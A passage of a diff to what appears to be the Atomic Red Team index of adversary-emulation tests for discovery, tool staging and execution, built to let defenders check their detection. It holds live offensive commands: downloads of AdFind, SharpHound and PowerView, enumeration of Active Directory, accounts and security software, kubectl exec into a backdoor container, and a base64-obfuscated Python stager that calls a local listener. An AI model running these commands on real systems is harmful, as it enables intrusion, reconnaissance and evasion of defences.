admin cmdlets must be installed - ' +' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" - ' +' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" @@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system - ' +' supported_platforms: - macos - linux @@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file - ' +' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 - ' +' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user - ' +' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username - ' +' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely - ' +' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get install login; exit 1; - ' +' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups - ' +' supported_platforms: - linux - macos @@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups - ' +' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery - ' +' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) - ' +' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" - ' +' executor: name: powershell elevation_required: false @@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore - ' +' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'wmic.exe group get name - ' +' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group - ' +' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed - ' +' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python - ' +' supported_platforms: - windows input_arguments: @@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' executor: command: 'python #{filename} -i #{host_ip} - ' +' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery - ' +' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus - ' +' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares - ' +' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} - ' +' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare - ' +' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share - ' +' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain - ' +' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: '"Join system to domain" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 - ' +' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. - ' +' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v7 - ' +' executor: command: 'cat /etc/security/pwquality.conf - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v6 - ' +' executor: command: | cat /etc/pam.d/system-auth @@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. - ' +' supported_platforms: - linux executor: command: 'cat /etc/login.defs - ' +' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts - ' +' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts /domain - ' +' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. - ' +' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist - ' +' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain - ' +' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} - ' +' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 @@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i - ' +' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a - ' +' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' - ' +' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done - ' +' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'adidnsdump must be installed and part of PATH - ' +' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} - ' +' get_prereq_command: 'pip3 install adidnsdump - ' +' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} - ' +' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip neighbour show - ' +' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip route show - ' +' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." - ' +' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' - ' +' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' - ' +' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 - ' +' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - ' +' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors - ' +' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. - ' +' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info - ' +' supported_platforms: - macos executor: @@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info - ' +' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null - ' +' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. - ' +' supported_platforms: - windows executor: command: 'hostname - ' +' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. - ' +' supported_platforms: - linux - macos executor: command: 'hostname - ' +' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. - ' +' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid - ' +' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 @@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - windows executor: command: 'set - ' +' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - macos - linux executor: command: 'env - ' +' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all - ' +' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist - ' +' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" - ' +' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection - ' +' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; - ' +' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) - ' +' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. - ' +' supported_platforms: - windows executor: command: 'Get-Date - ' +' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date - ' +' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\" | python &\"" - ' +' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. - ' +' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} - ' +' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n 